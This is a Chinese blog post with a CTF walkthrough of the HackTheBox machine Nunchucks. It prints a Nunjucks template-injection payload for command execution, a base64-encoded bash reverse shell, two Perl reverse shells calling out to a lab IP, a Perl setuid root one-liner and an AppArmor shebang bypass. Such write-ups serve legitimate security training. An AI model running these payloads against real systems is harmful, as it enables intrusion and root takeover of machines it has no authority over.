HackTheBox | Nunchucks

已于 2023-01-07 15:02:54 修改
阅读量187 收藏
点赞数
分类专栏: htb记录 文章标签: 网络安全
于 2023-01-07 15:02:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Purpose_7/article/details/128591100
版权
文章描述了一次在HackTheBox平台上的Nunchucks靶机攻破过程,涉及Web漏洞利用,包括nmap扫描发现开放端口,利用SSTI漏洞执行命令,通过Perl的cap_setuid权限进行权限提升,以及如何利用AppArmor的限制绕过以获取root权限。过程中提到了perl脚本的分析和利用,以及AppArmor配置文件的审查。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

HackTheBox | Nunchucks

nmap扫描,开放22、80、443

image-20230107131958769

修改本地hosts文件,访问web站点

image-20230107132150832

找到登录页面和注册页面,但是都被禁用

image-20230107132423149

dirsearch扫描也没有什么有效信息

image-20230107132917181

在页面最下方看到links,其中有个store还未上线

看了wp之后知道,确实存在store这个站点,将store.nunchucks.htb添加到hosts文件中访问

image-20230107133308810

在页面中输入框内输入内容,发现会回显到前端

image-20230107133451569

尝试SSTI,确实存在;由于直接输入{{3*3}}时会提示让输入邮箱,所以写成了完整的邮箱格式

image-20230107133543559

使用payload成功命令执行,参考《SANDBOX BREAKOUT - A VIEW OF THE NUNJUCKS TEMPLATE ENGINE》http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine

{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')\")()}}

image-20230107140440770

反弹shell

{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4yLzEyMzQgMD4mMSI=|base64 -d|bash -i')\")()}}

image-20230107140753266

检查SUID,看到/usr/sbin/pppd

image-20230107141039629

上传LinEnum.sh信息收集

看到特殊cap特权,perl存在cap_setuid权限

image-20230107141529493

找到特权利用方法

image-20230107141817716

直接使用上面的无法获取到root权限的shell,所以尝试命令执行,发现可以执行一些简单的命令

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";'

image-20230107141826371

尝试直接使用perl反弹shell,在网上找到两种perl反弹shell的方式,第二种成功getshell;第一种会在接收到shell之后立即断开

# 方法一
perl -e 'use Socket;$i="10.10.10.11";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# 方法二
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.11:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

方法二反弹回来的shell权限如下

image-20230107143745024

但是问题在于,虽然是root用户,仍然无法读取root路径下的内容,提示权限不足

查看wp之后,看到涉及到apparmor,又是一个没有接触过的东西

查找资料《apparmor_什么是AppArmor?如何确保Ubuntu安全?》https://blog.youkuaiyun.com/culingluan4376/article/details/108708675

apparmor可以用于细粒度的权限控制,其配置文件位于/etc/apparmor.d路径下

进入路径,看到了配置文件

image-20230107144334471

usr.bin.perl文件中记录了perl的权限控制情况,可以看到拒绝了对/root路径下文件的读写执行,所以无法看到root用户家目录下的内容

# Last Modified: Tue Aug 31 18:25:30 2021
#include <tunables/global>

/usr/bin/perl {
  #include <abstractions/base>
  #include <abstractions/nameservice>
  #include <abstractions/perl>

  capability setuid,

  deny owner /etc/nsswitch.conf r,
  deny /root/* rwx,
  deny /etc/shadow rwx,

  /usr/bin/id mrix,
  /usr/bin/ls mrix,
  /usr/bin/cat mrix,
  /usr/bin/whoami mrix,
  /opt/backup.pl mrix,
  owner /home/ r,
  owner /home/david/ r,

}

其中有一个特殊的perl文件/opt/backup.pl,查看文件内容

#!/usr/bin/perl
use strict;
use POSIX qw(strftime);
use DBI;
use POSIX qw(setuid);
POSIX::setuid(0);

my $tmpdir        = "/tmp";
my $backup_main = '/var/www';
my $now = strftime("%Y-%m-%d-%s", localtime);
my $tmpbdir = "$tmpdir/backup_$now";

sub printlog
{
    print "[", strftime("%D %T", localtime), "] $_[0]\n";
}

sub archive
{
    printlog "Archiving...";
    system("/usr/bin/tar -zcf $tmpbdir/backup_$now.tar $backup_main/* 2>/dev/null");
    printlog "Backup complete in $tmpbdir/backup_$now.tar";
}

if ($> != 0) {
    die "You must run this script as root.\n";
}

printlog "Backup starts.";
mkdir($tmpbdir);
&archive;
printlog "Moving $tmpbdir/backup_$now to /opt/web_backups";
system("/usr/bin/mv $tmpbdir/backup_$now.tar /opt/web_backups/");
printlog "Removing temporary directory";
rmdir($tmpbdir);
printlog "Completed";

虽然不会perl编程,但是可以强行理解以下脚本内容。大概作用就是将/var/www目录下的内容进行压缩,然后存储到/opt/web_backups路径下,好像没有可以利用的点

又是参考了wp,利用了apparmor对perl限制的一个bug,参考《Unable to prevent execution of shebang lines》https://bugs.launchpad.net/apparmor/+bug/1911431

该bug大概是描述了可以通过执行perl脚本的方式绕过perl -e执行过程中的权限限制。将前面利用的perl+cap命令执行的语句改写为脚本,然后执行,确实成功绕过限制。

image-20230107145643139

image-20230107145609156

行为识别(二):创建Dataset类用于加载视频数据
qq_22003061的博客
05-12 1200
行为识别(二):创建Dataset类用于加载视频数据 文章目录行为识别(二):创建Dataset类用于加载视频数据1 设计思路2 python代码 1 设计思路 经过上一节的预处理,现在数据集的组织形式为 `-- dataset |-- test | |-- class1 | | |-- clip1 | | | |-- clip1_001.jpg | | | `-- clip1_002.jpg | | `-- cli
hack the box 注册时全名无效、reCapcha validation等注册问题
weixin_68177269的博客
03-12 4954
本篇文章主要记述了在注册hack the box时候遇到的问题及其解决办法。同样可以应用在注册其他外网的情况下。
Hack The Box注册 —邀请码教学(含注册失败及解决步骤)
热门推荐
qq_43337502的博客
08-15 1万+
Hack The Box注册 —邀请码教学(含注册失败及免费上网步骤)嫌麻烦的直接看这里详细教学看这里重头戏(无法注册解决方法) 官网:https://www.hackthebox.eu 邀请码填写地址:https://www.hackthebox.eu/invite 注册账号时需科学online 验证google机器人验证,提前准备好 推荐用手机注册,当然电脑也行(手机更快),这里用手机教学 嫌麻烦的直接看这里 打开官网->开发者选项(F12)->点击Console-> 输入$.post
[HTB]Nunchucks
cosmoslin的博客
11-14 2062
信息搜集 nmap 发现开放端口: SSH (22), HTTP (80), and HTTPS (443) cosmos@kali:/$ nmap -A 10.10.11.122 Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-13 20:44 CST Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: Abo.
Hackthebox靶场连接
weixin_47100211的博客
04-03 3397
关于注册账号 刚开始注册账号 注册账号需要科学上网之后才可以注册,否则点击注册后没有反应 另外在填写全名时需要在姓后面加空格否则不符合规范 例如: Zhang san 靶场会提供免费的机器来供参与者使用,VIP会有更多的功能和把靶场使用,并且有官方的靶场解析,每周会有新的靶场加入到免费的使用中。 使用靶场有两种方式,第一种是在线环境,但是免费用户只有2个小时的使用时间,我使用本地的第二种方法,用kali连接VPN使用靶场。 选择第一个靶场后下载VPN文件: 有两种方法可以连接,我选择的
Hackthebox Three
lixiangshidie的博客
12-29 759
hackthebox three
HTB_Nunchucks
weixin_44193247的博客
10-02 642
HTB_学习篇
使用 Wii Nunchucks 和 LED 屏幕在 Raspberry Pi 上实现的简易 Pong 游戏
资源摘要信息:"使用Wii Nunchucks、LED矩阵显示器和7段显示器在Raspberry Pi Model B上实现Pong游戏" 知识点详细说明: 1. Wii Nunchucks(双节棍控制器)的使用: Wii Nunchucks是任天堂公司为Wii游戏机开发的...
Atom-lazy-light-syntax,懒原子轻语法主题。(javascript、nunchucks、php、twig、html).zip
09-18
Atom-lazy-light-syntax.zip,懒原子轻语法主题。(javascript、nunchucks、php、twig、html)懒光语法主题,atom是一个用web技术构建的开源文本编辑器。
ucf101每个分类的样本个数
04-02
56. Nunchucks: 118 57. ParallelBars: 149 58. PizzaTossing: 100 59. PlayingCello: 150 60. PlayingDaf: 100 61. PlayingDhol: 100 62. PlayingFlute: 149 63. PlayingGuitar: 147 64. PlayingPiano: 150...
Hack The Box靶场简单使用流程
Zyu0
11-26 2675
加入一个动态增长的黑客社区,并通过最迷人的、游戏化的、实际操作的培训经验,把您的网络安全技能提高到下一个水平!
渗透测试平台【Hack The Box】获取邀请码与注册讲解
爱国小白帽
12-08 5300
Hack The Box 官方网址:hackthebox.eu/ : 注册鏈接 这里需要填写邀请码,想想会在哪里呢? 第一步肯定是打开F12,查看网络,发现有inviteapi.min.js inviteapi.min.js的全拼是邀请人的意思,答案会不会在这里呢?我们双击打开 然后跳到了这样的页面,发现有makeInviteCode这样的函数 百度翻译是生成邀请代码的意思,答案是这没...
hackthebox注册教程
shy的博客
02-01 1万+
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现需要邀请码,上网搜了搜,发现邀请码得靠自己获取,好吧,我接受这个挑战。 使用view-source:https://www....
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8685
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
雷达驱动 rplidar-ros 与建图算法 hector-slam 资源包
05-03
雷达驱动 rplidar-ros 与建图算法 hector-slam 资源包
威纶通触摸屏与汇川SV660P伺服通讯程序:实现正反转控制、速度与电压监测功能,实时在线模拟并修改COM口监控模块温度
最新发布
05-03
内容概要:本文详细介绍了威纶通触摸屏与汇川SV660P伺服之间的Modbus RTU通讯实现方法,涵盖硬件接线、通讯参数配置、控制逻辑脚本编写以及状态监控等方面的内容。具体来说,文章首先讲解了硬件接线注意事项,如终端电阻设置和双绞线连接方式;接着深入探讨了通讯参数配置,包括波特率、数据位、停止位和校验方式等;然后展示了如何通过宏指令和Lua脚本实现正反转控制、速度设定等功能;最后讨论了状态监控部分,如母线电压和温度监测,并提供了相应的代码示例。此外,还分享了一些调试经验和常见问题解决方案。 适合人群:从事工业自动化领域的工程师和技术人员,尤其是对Modbus RTU通讯有一定了解的人群。 使用场景及目标:适用于需要通过触摸屏控制多台伺服电机并进行实时数据监控的场合,旨在帮助技术人员快速掌握具体的实现步骤和技巧,提高工作效率。 其他说明:文中提供的代码片段可以直接应用于实际项目中,但需要注意根据实际情况调整相关参数。同时,在调试过程中可能会遇到一些问题,如通讯不稳定或数据异常等,此时可以根据文中提到的经验进行排查和解决。
铜陵区县边界,矢量边界,shp格式
05-03
矢量边界,行政区域边界,精确到区县,可直接导入arcgis使用
基于机器学习的锂离子电池容量估计与寿命预测:多通道充电配置与神经网络应用
05-03
内容概要:本文详细探讨了利用机器学习技术进行锂离子电池容量估计和健康状态预测的方法。首先介绍了充电数据的获取和预处理步骤,包括电压、电流、温度等多通道时序数据的采集和归一化处理。接着分别尝试了三种不同的神经网络模型:前馈神经网络(FNN)、卷积神经网络(CNN)和长短时记忆网络(LSTM),并分析了各自的优缺点。实验结果显示,FNN适用于结构化特征,CNN擅长捕捉局部模式,LSTM则在处理时序依赖方面表现出色。最终提出了一种融合模型,结合CNN和LSTM的优势,实现了更高的预测精度。此外,文中还讨论了数据预处理、模型优化以及实际应用中的注意事项。 适合人群:从事电池管理系统、机器学习、数据分析等相关领域的研究人员和技术人员。 使用场景及目标:①用于电池健康状态监测系统的设计与开发;②提高电池容量估计的准确性,延长设备使用寿命;③优化电池管理系统的性能,确保设备安全运行。 其他说明:文中提供了详细的代码示例,帮助读者更好地理解和复现实验结果。同时强调了数据预处理和特征工程的重要性,指出合理的数据处理方式能够显著提升模型的表现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值